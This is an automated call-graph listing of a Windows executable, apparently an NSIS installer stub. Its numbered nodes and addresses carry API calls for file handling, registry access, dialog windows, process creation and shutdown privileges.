ReadFile 4481->4482 4483 40345a 4482->4483 4483->4478 4485 406968 4484->4485 4486 406970 4484->4486 4485->4478 4486->4485 4486->4486 4487 406a00 GlobalAlloc 4486->4487 4488 4069f7 GlobalFree 4486->4488 4489 406a77 GlobalAlloc 4486->4489 4490 406a6e GlobalFree 4486->4490 4487->4485 4487->4486 4488->4487 4489->4485 4489->4486 4490->4489 4492 402eb7 4491->4492 4493 402e9f 4491->4493 4494 402ec7 GetTickCount 4492->4494 4495 402ebf 4492->4495 4496 402ea8 DestroyWindow 4493->4496 4497 402eaf 4493->4497 4494->4497 4499 402ed5 4494->4499 4506 4067fe 4495->4506 4496->4497 4497->4478 4500 402f0a CreateDialogParamW ShowWindow 4499->4500 4501 402edd 4499->4501 4500->4497 4501->4497 4510 402e72 4501->4510 4503 402eeb wsprintfW 4504 405450 24 API calls 4503->4504 4505 402f08 4504->4505 4505->4497 4507 40681b PeekMessageW 4506->4507 4508 406811 DispatchMessageW 4507->4508 4509 40682b 4507->4509 4508->4507 4509->4497 4511 402e81 4510->4511 4512 402e83 MulDiv 4510->4512 4511->4512 4512->4503 5452 402868 5453 402c41 17 API calls 5452->5453 5454 40286f FindFirstFileW 5453->5454 5455 402882 5454->5455 5456 402897 5454->5456 5460 40632f wsprintfW 5456->5460 5458 4028a0 5461 4063e8 lstrcpynW 5458->5461 5460->5458 5461->5455 5462 401968 5463 402c1f 17 API calls 5462->5463 5464 40196f 5463->5464 5465 402c1f 17 API calls 5464->5465 5466 40197c 5465->5466 5467 402c41 17 API calls 5466->5467 5468 401993 lstrlenW 5467->5468 5469 4019a4 5468->5469 5470 4019e5 5469->5470 5474 4063e8 lstrcpynW 5469->5474 5472 4019d5 5472->5470 5473 4019da lstrlenW 5472->5473 5473->5470 5474->5472 5475 40166a 5476 402c41 17 API calls 5475->5476 5477 401670 5476->5477 5478 40672b 2 API calls 5477->5478 5479 401676 5478->5479 5480 7396103d 5483 7396101b 5480->5483 5490 73961516 5483->5490 5485 73961020 5486 73961027 GlobalAlloc 5485->5486 5487 73961024 5485->5487 5486->5487 5488 7396153d 3 API calls 5487->5488 5489 7396103b 5488->5489 5492 7396151c 5490->5492 5491 73961522 5491->5485 5492->5491 5493 7396152e GlobalFree 5492->5493 5493->5485 5001 40176f 5002 402c41 17 API calls 5001->5002 5003 401776 5002->5003 5004 401796 5003->5004 5005 40179e 5003->5005 5041 4063e8 lstrcpynW 5004->5041 5042 4063e8 lstrcpynW 5005->5042 5008 40179c 5012 40667c 5 API calls 5008->5012 5009 4017a9 5010 405cbd 3 API calls 5009->5010 5011 4017af lstrcatW 5010->5011 5011->5008 5030 4017bb 5012->5030 5013 4017f7 5015 405eb9 2 API calls 5013->5015 5014 40672b 2 API calls 5014->5030 5015->5030 5017 4017cd CompareFileTime 5017->5030 5018 40188d 5020 405450 24 API calls 5018->5020 5019 401864 5021 405450 24 API calls 5019->5021 5039 401879 5019->5039 5022 401897 5020->5022 5021->5039 5023 4031d6 44 API calls 5022->5023 5025 4018aa 5023->5025 5024 4063e8 lstrcpynW 5024->5030 5026 4018be SetFileTime 5025->5026 5027 4018d0 CloseHandle 5025->5027 5026->5027 5029 4018e1 5027->5029 5027->5039 5028 40640a 17 API calls 5028->5030 5031 4018e6 5029->5031 5032 4018f9 5029->5032 5030->5013 5030->5014 5030->5017 5030->5018 5030->5019 5030->5024 5030->5028 5037 405a4e MessageBoxIndirectW 5030->5037 5040 405ede GetFileAttributesW CreateFileW 5030->5040 5033 40640a 17 API calls 5031->5033 5034 40640a 17 API calls 5032->5034 5035 4018ee lstrcatW 5033->5035 5036 401901 5034->5036 5035->5036 5038 405a4e MessageBoxIndirectW 5036->5038 5037->5030 5038->5039 5040->5030 5041->5008 5042->5009 5043 4027ef 5044 4027f6 5043->5044 5046 402a70 5043->5046 5045 402c1f 17 API calls 5044->5045 5047 4027fd 5045->5047 5048 40280c SetFilePointer 5047->5048 5048->5046 5049 40281c 5048->5049 5051 40632f wsprintfW 5049->5051 5051->5046 5494 401a72 5495 402c1f 17 API calls 5494->5495 5496 401a7b 5495->5496 5497 402c1f 17 API calls 5496->5497 5498 401a20 5497->5498 5499 406af2 5503 406976 5499->5503 5500 4072e1 5501 406a00 GlobalAlloc 5501->5500 5501->5503 5502 4069f7 GlobalFree 5502->5501 5503->5500 5503->5501 5503->5502 5504 406a77 GlobalAlloc 5503->5504 5505 406a6e GlobalFree 5503->5505 5504->5500 5504->5503 5505->5504 5506 401573 5507 401583 ShowWindow 5506->5507 5508 40158c 5506->5508 5507->5508 5509 40159a ShowWindow 5508->5509 5510 402ac5 5508->5510 5509->5510 5511 401cf3 5512 402c1f 17 API calls 5511->5512 5513 401cf9 IsWindow 5512->5513 5514 401a20 5513->5514 5515 402df3 5516 402e05 SetTimer 5515->5516 5517 402e1e 5515->5517 5516->5517 5518 402e6c 5517->5518 5519 402e72 MulDiv 5517->5519 5520 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5519->5520 5520->5518 5522 4014f5 SetForegroundWindow 5523 402ac5 5522->5523 5524 402576 5525 402c41 17 API calls 5524->5525 5526 40257d 5525->5526 5529 405ede GetFileAttributesW CreateFileW 5526->5529 5528 402589 5529->5528 5530 401b77 5531 401b84 5530->5531 5532 401bc8 5530->5532 5533 401c0d 5531->5533 5539 401b9b 5531->5539 5534 401bf2 GlobalAlloc 5532->5534 5535 401bcd 5532->5535 5537 40640a 17 API calls 5533->5537 5542 4022f7 5533->5542 5536 40640a 17 API calls 5534->5536 5535->5542 5551 4063e8 lstrcpynW 5535->5551 5536->5533 5540 4022f1 5537->5540 5549 4063e8 lstrcpynW 5539->5549 5544 405a4e MessageBoxIndirectW 5540->5544 5541 401bdf GlobalFree 5541->5542 5544->5542 5545 401baa 5550 4063e8 lstrcpynW 5545->5550 5547 401bb9 5552 4063e8 lstrcpynW 5547->5552 5549->5545 5550->5547 5551->5541 5552->5542 5235 4024f8 5236 402c81 17 API calls 5235->5236 5237 402502 5236->5237 5238 402c1f 17 API calls 5237->5238 5239 40250b 5238->5239 5240 402533 RegEnumValueW 5239->5240 5241 402527 RegEnumKeyW 5239->5241 5244 40288b 5239->5244 5242 40254f RegCloseKey 5240->5242 5243 402548 5240->5243 5241->5242 5242->5244 5243->5242 5246 40167b 5247 402c41 17 API calls 5246->5247 5248 401682 5247->5248 5249 402c41 17 API calls 5248->5249 5250 40168b 5249->5250 5251 402c41 17 API calls 5250->5251 5252 401694 MoveFileW 5251->5252 5253 4016a7 5252->5253 5259 4016a0 5252->5259 5255 40672b 2 API calls 5253->5255 5257 402250 5253->5257 5254 401423 24 API calls 5254->5257 5256 4016b6 5255->5256 5256->5257 5258 4061ae 36 API calls 5256->5258 5258->5259 5259->5254 5560 401e7d 5561 402c41 17 API calls 5560->5561 5562 401e83 5561->5562 5563 402c41 17 API calls 5562->5563 5564 401e8c 5563->5564 5565 402c41 17 API calls 5564->5565 5566 401e95 5565->5566 5567 402c41 17 API calls 5566->5567 5568 401e9e 5567->5568 5569 401423 24 API calls 5568->5569 5570 401ea5 5569->5570 5577 405a14 ShellExecuteExW 5570->5577 5572 401ee7 5575 40288b 5572->5575 5578 406873 WaitForSingleObject 5572->5578 5574 401f01 CloseHandle 5574->5575 5577->5572 5579 40688d 5578->5579 5580 40689f GetExitCodeProcess 5579->5580 5581 4067fe 2 API calls 5579->5581 5580->5574 5582 406894 WaitForSingleObject 5581->5582 5582->5579 5583 4019ff 5584 402c41 17 API calls 5583->5584 5585 401a06 5584->5585 5586 402c41 17 API calls 5585->5586 5587 401a0f 5586->5587 5588 401a16 lstrcmpiW 5587->5588 5589 401a28 lstrcmpW 5587->5589 5590 401a1c 5588->5590 5589->5590 5591 401000 5592 401037 BeginPaint GetClientRect 5591->5592 5593 40100c DefWindowProcW 5591->5593 5595 4010f3 5592->5595 5596 401179 5593->5596 5597 401073 CreateBrushIndirect FillRect DeleteObject 5595->5597 5598 4010fc 5595->5598 5597->5595 5599 401102 CreateFontIndirectW 5598->5599 5600 401167 EndPaint 5598->5600 5599->5600 5601 401112 6 API calls 5599->5601 5600->5596 5601->5600 5602 73962c57 5603 73962c6f 5602->5603 5604 7396158f 2 API calls 5603->5604 5605 73962c8a 5604->5605 5606 739616d4 5607 73961703 5606->5607 5608 73961b5f 22 API calls 5607->5608 5609 7396170a 5608->5609 5610 73961711 5609->5610 5611 7396171d 5609->5611 5612 73961272 2 API calls 5610->5612 5613 73961727 5611->5613 5614 73961744 5611->5614 5617 7396171b 5612->5617 5618 7396153d 3 API calls 5613->5618 5615 7396176e 5614->5615 5616 7396174a 5614->5616 5619 7396153d 3 API calls 5615->5619 5621 73961272 2 API calls 5616->5621 5620 7396172c 5618->5620 5619->5617 5622 73961272 2 API calls 5620->5622 5623 73961755 GlobalFree 5621->5623 5624 73961738 GlobalFree 5622->5624 5623->5617 5625 73961769 GlobalFree 5623->5625 5624->5617 5625->5617 5626 401503 5627 40150b 5626->5627 5629 40151e 5626->5629 5628 402c1f 17 API calls 5627->5628 5628->5629 4513 402484 4524 402c81 4513->4524 4516 402c41 17 API calls 4517 402497 4516->4517 4518 4024a2 RegQueryValueExW 4517->4518 4520 40288b 4517->4520 4519 4024c2 4518->4519 4523 4024c8 RegCloseKey 4518->4523 4519->4523 4529 40632f wsprintfW 4519->4529 4523->4520 4525 402c41 17 API calls 4524->4525 4526 402c98 4525->4526 4527 406255 RegOpenKeyExW 4526->4527 4528 40248e 4527->4528 4528->4516 4529->4523 5630 402104 5631 402c41 17 API calls 5630->5631 5632 40210b 5631->5632 5633 402c41 17 API calls 5632->5633 5634 402115 5633->5634 5635 402c41 17 API calls 5634->5635 5636 40211f 5635->5636 5637 402c41 17 API calls 5636->5637 5638 402129 5637->5638 5639 402c41 17 API calls 5638->5639 5641 402133 5639->5641 5640 402172 CoCreateInstance 5643 402191 5640->5643 5641->5640 5642 402c41 17 API calls 5641->5642 5642->5640 5644 401423 24 API calls 5643->5644 5645 402250 5643->5645 5644->5645 4776 403e86 4777 403fd9 4776->4777 4778 403e9e 4776->4778 4780 40402a 4777->4780 4781 403fea GetDlgItem GetDlgItem 4777->4781 4778->4777 4779 403eaa 4778->4779 4783 403eb5 SetWindowPos 4779->4783 4784 403ec8 4779->4784 4782 404084 4780->4782 4793 401389 2 API calls 4780->4793 4785 40435f 18 API calls 4781->4785 4786 4043ab SendMessageW 4782->4786 4794 403fd4 4782->4794 4783->4784 4787 403ee5 4784->4787 4788 403ecd ShowWindow 4784->4788 4789 404014 SetClassLongW 4785->4789 4814 404096 4786->4814 4790 403f07 4787->4790 4791 403eed DestroyWindow 4787->4791 4788->4787 4792 40140b 2 API calls 4789->4792 4796 403f0c SetWindowLongW 4790->4796 4797 403f1d 4790->4797 4795 404309 4791->4795 4792->4780 4798 40405c 4793->4798 4795->4794 4807 404319 ShowWindow 4795->4807 4796->4794 4799 403fc6 4797->4799 4800 403f29 GetDlgItem 4797->4800 4798->4782 4801 404060 SendMessageW 4798->4801 4857 4043c6 4799->4857 4804 403f59 4800->4804 4805 403f3c SendMessageW IsWindowEnabled 4800->4805 4801->4794 4802 40140b 2 API calls 4802->4814 4803 4042ea DestroyWindow EndDialog 4803->4795 4809 403f66 4804->4809 4811 403fad SendMessageW 4804->4811 4812 403f79 4804->4812 4821 403f5e 4804->4821 4805->4794 4805->4804 4807->4794 4808 40640a 17 API calls 4808->4814 4809->4811 4809->4821 4811->4799 4815 403f81 4812->4815 4816 403f96 4812->4816 4813 403f94 4813->4799 4814->4794 4814->4802 4814->4803 4814->4808 4817 40435f 18 API calls 4814->4817 4838 40422a DestroyWindow 4814->4838 4848 40435f 4814->4848 4819 40140b 2 API calls 4815->4819 4818 40140b 2 API calls 4816->4818 4817->4814 4820 403f9d 4818->4820 4819->4821 4820->4799 4820->4821 4854 404338 4821->4854 4823 404111 GetDlgItem 4824 404126 4823->4824 4825 40412e ShowWindow KiUserCallbackDispatcher 4823->4825 4824->4825 4851 404381 EnableWindow 4825->4851 4827 404158 EnableWindow 4832 40416c 4827->4832 4828 404171 GetSystemMenu EnableMenuItem SendMessageW 4829 4041a1 SendMessageW 4828->4829 4828->4832 4829->4832 4831 403e67 18 API calls 4831->4832 4832->4828 4832->4831 4852 404394 SendMessageW 4832->4852 4853 4063e8 lstrcpynW 4832->4853 4834 4041d0 lstrlenW 4835 40640a 17 API calls 4834->4835 4836 4041e6 SetWindowTextW 4835->4836 4837 401389 2 API calls 4836->4837 4837->4814 4838->4795 4839 404244 CreateDialogParamW 4838->4839 4839->4795 4840 404277 4839->4840 4841 40435f 18 API calls 4840->4841 4842 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4841->4842 4843 401389 2 API calls 4842->4843 4844 4042c8 4843->4844 4844->4794 4845 4042d0 ShowWindow 4844->4845 4846 4043ab SendMessageW 4845->4846 4847 4042e8 4846->4847 4847->4795 4849 40640a 17 API calls 4848->4849 4850 40436a SetDlgItemTextW 4849->4850 4850->4823 4851->4827 4852->4832 4853->4834 4855 404345 SendMessageW 4854->4855 4856 40433f 4854->4856 4855->4813 4856->4855 4858 404489 4857->4858 4859 4043de GetWindowLongW 4857->4859 4858->4794 4859->4858 4860 4043f3 4859->4860 4860->4858 4861 404420 GetSysColor 4860->4861 4862 404423 4860->4862 4861->4862 4863 404433 SetBkMode 4862->4863 4864 404429 SetTextColor 4862->4864 4865 404451 4863->4865 4866 40444b GetSysColor 4863->4866 4864->4863 4867 404462 4865->4867 4868 404458 SetBkColor 4865->4868 4866->4865 4867->4858 4869 404475 DeleteObject 4867->4869 4870 40447c CreateBrushIndirect 4867->4870 4868->4867 4869->4870 4870->4858 5646 401f06 5647 402c41 17 API calls 5646->5647 5648 401f0c 5647->5648 5649 405450 24 API calls 5648->5649 5650 401f16 5649->5650 5651 4059d1 2 API calls 5650->5651 5652 401f1c 5651->5652 5653 401f3f CloseHandle 5652->5653 5655 406873 5 API calls 5652->5655 5656 40288b 5652->5656 5653->5656 5657 401f31 5655->5657 5657->5653 5659 40632f wsprintfW 5657->5659 5659->5653 5660 404809 5661 404819 5660->5661 5662 40483f 5660->5662 5663 40435f 18 API calls 5661->5663 5664 4043c6 8 API calls 5662->5664 5665 404826 SetDlgItemTextW 5663->5665 5666 40484b 5664->5666 5665->5662 5667 40190c 5668 401943 5667->5668 5669 402c41 17 API calls 5668->5669 5670 401948 5669->5670 5671 405afa 67 API calls 5670->5671 5672 401951 5671->5672 5673 40230c 5674 402314 5673->5674 5679 40231a 5673->5679 5675 402c41 17 API calls 5674->5675 5675->5679 5676 402c41 17 API calls 5678 402328 5676->5678 5677 402336 5681 402c41 17 API calls 5677->5681 5678->5677 5680 402c41 17 API calls 5678->5680 5679->5676 5679->5678 5680->5677 5682 40233f WritePrivateProfileStringW 5681->5682 5683 401f8c 5684 402c41 17 API calls 5683->5684 5685 401f93 5684->5685 5686 4067c2 5 API calls 5685->5686 5687 401fa2 5686->5687 5688 401fbe GlobalAlloc 5687->5688 5689 402026 5687->5689 5688->5689 5690 401fd2 5688->5690 5691 4067c2 5 API calls 5690->5691 5692 401fd9 5691->5692 5693 4067c2 5 API calls 5692->5693 5694 401fe3 5693->5694 5694->5689 5698 40632f wsprintfW 5694->5698 5696 402018 5699 40632f wsprintfW 5696->5699 5698->5696 5699->5689 4972 40238e 4973 4023c1 4972->4973 4974 402396 4972->4974 4976 402c41 17 API calls 4973->4976 4975 402c81 17 API calls 4974->4975 4977 40239d 4975->4977 4978 4023c8 4976->4978 4979 4023a7 4977->4979 4981 4023d5 4977->4981 4984 402cff 4978->4984 4982 402c41 17 API calls 4979->4982 4983 4023ae RegDeleteValueW RegCloseKey 4982->4983 4983->4981 4985 402d0c 4984->4985 4986 402d13 4984->4986 4985->4981 4986->4985 4988 402d44 4986->4988 4989 406255 RegOpenKeyExW 4988->4989 4990 402d72 4989->4990 4991 402dec 4990->4991 4996 402d76 4990->4996 4991->4985 4992 402d98 RegEnumKeyW 4993 402daf RegCloseKey 4992->4993 4992->4996 4994 4067c2 5 API calls 4993->4994 4997 402dbf 4994->4997 4995 402dd0 RegCloseKey 4995->4991 4996->4992 4996->4993 4996->4995 4998 402d44 6 API calls 4996->4998 4999 402de0 RegDeleteKeyW 4997->4999 5000 402dc3 4997->5000 4998->4996 4999->4991 5000->4991 5700 73961058 5702 73961074 5700->5702 5701 739610dd 5702->5701 5703 73961516 GlobalFree 5702->5703 5704 73961092 5702->5704 5703->5704 5705 73961516 GlobalFree 5704->5705 5706 739610a2 5705->5706 5707 739610b2 5706->5707 5708 739610a9 GlobalSize 5706->5708 5709 739610b6 GlobalAlloc 5707->5709 5710 739610c7 5707->5710 5708->5707 5711 7396153d 3 API calls 5709->5711 5712 739610d2 GlobalFree 5710->5712 5711->5710 5712->5701 5713 739618d9 5714 739618fc 5713->5714 5715 73961943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5714->5715 5716 73961931 GlobalFree 5714->5716 5717 73961272 2 API calls 5715->5717 5716->5715 5718 73961ace GlobalFree GlobalFree 5717->5718 5719 40190f 5720 402c41 17 API calls 5719->5720 5721 401916 5720->5721 5722 405a4e MessageBoxIndirectW 5721->5722 5723 40191f 5722->5723 5724 40558f 5725 4055b0 GetDlgItem GetDlgItem GetDlgItem 5724->5725 5726 405739 5724->5726 5769 404394 SendMessageW 5725->5769 5728 405742 GetDlgItem CreateThread CloseHandle 5726->5728 5729 40576a 5726->5729 5728->5729 5731 405795 5729->5731 5732 405781 ShowWindow ShowWindow 5729->5732 5733 4057ba 5729->5733 5730 405620 5736 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5730->5736 5734 4057f5 5731->5734 5738 4057a9 5731->5738 5739 4057cf ShowWindow 5731->5739 5771 404394 SendMessageW 5732->5771 5735 4043c6 8 API calls 5733->5735 5734->5733 5745 405803 SendMessageW 5734->5745 5740 4057c8 5735->5740 5743 405695 5736->5743 5744 405679 SendMessageW SendMessageW 5736->5744 5746 404338 SendMessageW 5738->5746 5741 4057e1 5739->5741 5742 4057ef 5739->5742 5747 405450 24 API calls 5741->5747 5748 404338 SendMessageW 5742->5748 5749 4056a8 5743->5749 5750 40569a SendMessageW 5743->5750 5744->5743 5745->5740 5751 40581c CreatePopupMenu 5745->5751 5746->5733 5747->5742 5748->5734 5753 40435f 18 API calls 5749->5753 5750->5749 5752 40640a 17 API calls 5751->5752 5754 40582c AppendMenuW 5752->5754 5755 4056b8 5753->5755 5756 405849 GetWindowRect 5754->5756 5757 40585c TrackPopupMenu 5754->5757 5758 4056c1 ShowWindow 5755->5758 5759 4056f5 GetDlgItem SendMessageW 5755->5759 5756->5757 5757->5740 5760 405877 5757->5760 5761 4056e4 5758->5761 5762 4056d7 ShowWindow 5758->5762 5759->5740 5763 40571c SendMessageW SendMessageW 5759->5763 5764 405893 SendMessageW 5760->5764 5770 404394 SendMessageW 5761->5770 5762->5761 5763->5740 5764->5764 5765 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5764->5765 5767 4058d5 SendMessageW 5765->5767 5767->5767 5768 4058fe GlobalUnlock SetClipboardData CloseClipboard 5767->5768 5768->5740 5769->5730 5770->5759 5771->5731 5772 401491 5773 405450 24 API calls 5772->5773 5774 401498 5773->5774 5782 401d14 5783 402c1f 17 API calls 5782->5783 5784 401d1b 5783->5784 5785 402c1f 17 API calls 5784->5785 5786 401d27 GetDlgItem 5785->5786 5787 402592 5786->5787 5788 404495 lstrcpynW lstrlenW 5789 403a96 5790 403aa1 5789->5790 5791 403aa5 5790->5791 5792 403aa8 GlobalAlloc 5790->5792 5792->5791 5793 402598 5794 4025c7 5793->5794 5795 4025ac 5793->5795 5797 4025fb 5794->5797 5798 4025cc 5794->5798 5796 402c1f 17 API calls 5795->5796 5803 4025b3 5796->5803 5800 402c41 17 API calls 5797->5800 5799 402c41 17 API calls 5798->5799 5801 4025d3 WideCharToMultiByte lstrlenA 5799->5801 5802 402602 lstrlenW 5800->5802 5801->5803 5802->5803 5804 40262f 5803->5804 5805 402645 5803->5805 5807 405fbf 5 API calls 5803->5807 5804->5805 5806 405f90 WriteFile 5804->5806 5806->5805 5807->5804 5808 40451e 5809 404536 5808->5809 5813 404650 5808->5813 5814 40435f 18 API calls 5809->5814 5810 4046ba 5811 404784 5810->5811 5812 4046c4 GetDlgItem 5810->5812 5819 4043c6 8 API calls 5811->5819 5815 404745 5812->5815 5816 4046de 5812->5816 5813->5810 5813->5811 5817 40468b GetDlgItem SendMessageW 5813->5817 5818 40459d 5814->5818 5815->5811 5821 404757 5815->5821 5816->5815 5820 404704 SendMessageW LoadCursorW SetCursor 5816->5820 5841 404381 EnableWindow 5817->5841 5823 40435f 18 API calls 5818->5823 5831 40477f 5819->5831 5842 4047cd 5820->5842 5825 40476d 5821->5825 5826 40475d SendMessageW 5821->5826 5828 4045aa CheckDlgButton 5823->5828 5830 404773 SendMessageW 5825->5830 5825->5831 5826->5825 5827 4046b5 5832 4047a9 SendMessageW 5827->5832 5839 404381 EnableWindow 5828->5839 5830->5831 5832->5810 5834 4045c8 GetDlgItem 5840 404394 SendMessageW 5834->5840 5836 4045de SendMessageW 5837 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5836->5837 5838 4045fb GetSysColor 5836->5838 5837->5831 5838->5837 5839->5834 5840->5836 5841->5827 5845 405a14 ShellExecuteExW 5842->5845 5844 404733 LoadCursorW SetCursor 5844->5815 5845->5844 5846 40149e 5847 4022f7 5846->5847 5848 4014ac PostQuitMessage 5846->5848 5848->5847 5849 401c1f 5850 402c1f 17 API calls 5849->5850 5851 401c26 5850->5851 5852 402c1f 17 API calls 5851->5852 5853 401c33 5852->5853 5854 401c48 5853->5854 5855 402c41 17 API calls 5853->5855 5856 401c58 5854->5856 5857 402c41 17 API calls 5854->5857 5855->5854 5858 401c63 5856->5858 5859 401caf 5856->5859 5857->5856 5861 402c1f 17 API calls 5858->5861 5860 402c41 17 API calls 5859->5860 5862 401cb4 5860->5862 5863 401c68 5861->5863 5864 402c41 17 API calls 5862->5864 5865 402c1f 17 API calls 5863->5865 5867 401cbd FindWindowExW 5864->5867 5866 401c74 5865->5866 5868 401c81 SendMessageTimeoutW 5866->5868 5869 401c9f SendMessageW 5866->5869 5870 401cdf 5867->5870 5868->5870 5869->5870 5871 402aa0 SendMessageW 5872 402ac5 5871->5872 5873 402aba InvalidateRect 5871->5873 5873->5872 5874 402821 5875 402827 5874->5875 5876 40282f FindClose 5875->5876 5877 402ac5 5875->5877 5876->5877 5878 4015a3 5879 402c41 17 API calls 5878->5879 5880 4015aa SetFileAttributesW 5879->5880 5881 4015bc 5880->5881 4533 4034a5 SetErrorMode GetVersion 4534 4034e4 4533->4534 4535 4034ea 4533->4535 4536 4067c2 5 API calls 4534->4536 4537 406752 3 API calls 4535->4537 4536->4535 4538 403500 lstrlenA 4537->4538 4538->4535 4539 403510 4538->4539 4540 4067c2 5 API calls 4539->4540 4541 403517 4540->4541 4542 4067c2 5 API calls 4541->4542 4543 40351e 4542->4543 4544 4067c2 5 API calls 4543->4544 4545 40352a #17 OleInitialize SHGetFileInfoW 4544->4545 4623 4063e8 lstrcpynW 4545->4623 4548 403576 GetCommandLineW 4624 4063e8 lstrcpynW 4548->4624 4550 403588 4551 405cea CharNextW 4550->4551 4552 4035ad CharNextW 4551->4552 4553 4036d7 GetTempPathW 4552->4553 4561 4035c6 4552->4561 4625 403474 4553->4625 4555 4036ef 4556 4036f3 GetWindowsDirectoryW lstrcatW 4555->4556 4557 403749 DeleteFileW 4555->4557 4558 403474 12 API calls 4556->4558 4635 402f30 GetTickCount GetModuleFileNameW 4557->4635 4562 40370f 4558->4562 4559 405cea CharNextW 4559->4561 4561->4559 4566 4036c2 4561->4566 4568 4036c0 4561->4568 4562->4557 4564 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4562->4564 4563 40375d 4572 405cea CharNextW 4563->4572 4576 403810 4563->4576 4607 403800 4563->4607 4567 403474 12 API calls 4564->4567 4721 4063e8 lstrcpynW 4566->4721 4570 403741 4567->4570 4568->4553 4570->4557 4570->4576 4586 40377c 4572->4586 4574 40394a 4578 403952 GetCurrentProcess OpenProcessToken 4574->4578 4579 4039ce ExitProcess 4574->4579 4575 40382a 4733 405a4e 4575->4733 4724 4039e6 4576->4724 4584 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4578->4584 4585 40399e 4578->4585 4582 403840 4588 4059b9 5 API calls 4582->4588 4583 4037da 4587 405dc5 18 API calls 4583->4587 4584->4585 4589 4067c2 5 API calls 4585->4589 4586->4582 4586->4583 4590 4037e6 4587->4590 4591 403845 lstrcatW 4588->4591 4592 4039a5 4589->4592 4590->4576 4722 4063e8 lstrcpynW 4590->4722 4593 403861 lstrcatW lstrcmpiW 4591->4593 4594 403856 lstrcatW 4591->4594 4595 4039ba ExitWindowsEx 4592->4595 4596 4039c7 4592->4596 4593->4576 4598 40387d 4593->4598 4594->4593 4595->4579 4595->4596 4599 40140b 2 API calls 4596->4599 4601 403882 4598->4601 4602 403889 4598->4602 4599->4579 4600 4037f5 4723 4063e8 lstrcpynW 4600->4723 4605 40591f 4 API calls 4601->4605 4603 40599c 2 API calls 4602->4603 4606 40388e SetCurrentDirectoryW 4603->4606 4608 403887 4605->4608 4609 4038a9 4606->4609 4610 40389e 4606->4610 4665 403ad8 4607->4665 4608->4606 4738 4063e8 lstrcpynW 4609->4738 4737 4063e8 lstrcpynW 4610->4737 4613 40640a 17 API calls 4614 4038e8 DeleteFileW 4613->4614 4615 4038f5 CopyFileW 4614->4615 4620 4038b7 4614->4620 4615->4620 4616 40393e 4617 4061ae 36 API calls 4616->4617 4617->4576 4618 4061ae 36 API calls 4618->4620 4619 40640a 17 API calls 4619->4620 4620->4613 4620->4616 4620->4618 4620->4619 4622 403929 CloseHandle 4620->4622 4739 4059d1 CreateProcessW 4620->4739 4622->4620 4623->4548 4624->4550 4626 40667c 5 API calls 4625->4626 4628 403480 4626->4628 4627 40348a 4627->4555 4628->4627 4629 405cbd 3 API calls 4628->4629 4630 403492 4629->4630 4631 40599c 2 API calls 4630->4631 4632 403498 4631->4632 4742 405f0d 4632->4742 4746 405ede GetFileAttributesW CreateFileW 4635->4746 4637 402f73 4664 402f80 4637->4664 4747 4063e8 lstrcpynW 4637->4747 4639 402f96 4640 405d09 2 API calls 4639->4640 4641 402f9c 4640->4641 4748 4063e8 lstrcpynW 4641->4748 4643 402fa7 GetFileSize 4644 4030a8 4643->4644 4662 402fbe 4643->4662 4645 402e8e 32 API calls 4644->4645 4646 4030af 4645->4646 4648 4030eb GlobalAlloc 4646->4648 4646->4664 4750 40345d SetFilePointer 4646->4750 4647 403447 ReadFile 4647->4662 4652 403102 4648->4652 4649 403143 4650 402e8e 32 API calls 4649->4650 4650->4664 4654 405f0d 2 API calls 4652->4654 4653 4030cc 4655 403447 ReadFile 4653->4655 4657 403113 CreateFileW 4654->4657 4658 4030d7 4655->4658 4656 402e8e 32 API calls 4656->4662 4659 40314d 4657->4659 4657->4664 4658->4648 4658->4664 4749 40345d SetFilePointer 4659->4749 4661 40315b 4663 4031d6 44 API calls 4661->4663 4662->4644 4662->4647 4662->4649 4662->4656 4662->4664 4663->4664 4664->4563 4666 4067c2 5 API calls 4665->4666 4667 403aec 4666->4667 4668 403af2 4667->4668 4669 403b04 4667->4669 4759 40632f wsprintfW 4668->4759 4670 4062b6 3 API calls 4669->4670 4671 403b34 4670->4671 4673 403b53 lstrcatW 4671->4673 4675 4062b6 3 API calls 4671->4675 4674 403b02 4673->4674 4751 403dae 4674->4751 4675->4673 4678 405dc5 18 API calls 4679 403b85 4678->4679 4680 403c19 4679->4680 4682 4062b6 3 API calls 4679->4682 4681 405dc5 18 API calls 4680->4681 4683 403c1f 4681->4683 4684 403bb7 4682->4684 4685 403c2f LoadImageW 4683->4685 4686 40640a 17 API calls 4683->4686 4684->4680 4689 403bd8 lstrlenW 4684->4689 4692 405cea CharNextW 4684->4692 4687 403cd5 4685->4687 4688 403c56 RegisterClassW 4685->4688 4686->4685 4691 40140b 2 API calls 4687->4691 4690 403c8c SystemParametersInfoW CreateWindowExW 4688->4690 4720 403cdf 4688->4720 4693 403be6 lstrcmpiW 4689->4693 4694 403c0c 4689->4694 4690->4687 4695 403cdb 4691->4695 4697 403bd5 4692->4697 4693->4694 4698 403bf6 GetFileAttributesW 4693->4698 4696 405cbd 3 API calls 4694->4696 4699 403dae 18 API calls 4695->4699 4695->4720 4700 403c12 4696->4700 4697->4689 4701 403c02 4698->4701 4703 403cec 4699->4703 4760 4063e8 lstrcpynW 4700->4760 4701->4694 4702 405d09 2 API calls 4701->4702 4702->4694 4705 403cf8 ShowWindow 4703->4705 4706 403d7b 4703->4706 4708 406752 3 API calls 4705->4708 4761 405523 OleInitialize 4706->4761 4710 403d10 4708->4710 4709 403d81 4711 403d85 4709->4711 4712 403d9d 4709->4712 4713 403d1e GetClassInfoW 4710->4713 4715 406752 3 API calls 4710->4715 4718 40140b 2 API calls 4711->4718 4711->4720 4714 40140b 2 API calls 4712->4714 4716 403d32 GetClassInfoW RegisterClassW 4713->4716 4717 403d48 DialogBoxParamW 4713->4717 4714->4720 4715->4713 4716->4717 4719 40140b 2 API calls 4717->4719 4718->4720 4719->4720 4720->4576 4721->4568 4722->4600 4723->4607 4725 403a01 4724->4725 4726 4039f7 CloseHandle 4724->4726 4727 403a15 4725->4727 4728 403a0b CloseHandle 4725->4728 4726->4725 4772 403a43 4727->4772 4728->4727 4731 405afa 67 API calls 4732 403819 OleUninitialize 4731->4732 4732->4574 4732->4575 4734 405a63 4733->4734 4735 403838 ExitProcess 4734->4735 4736 405a77 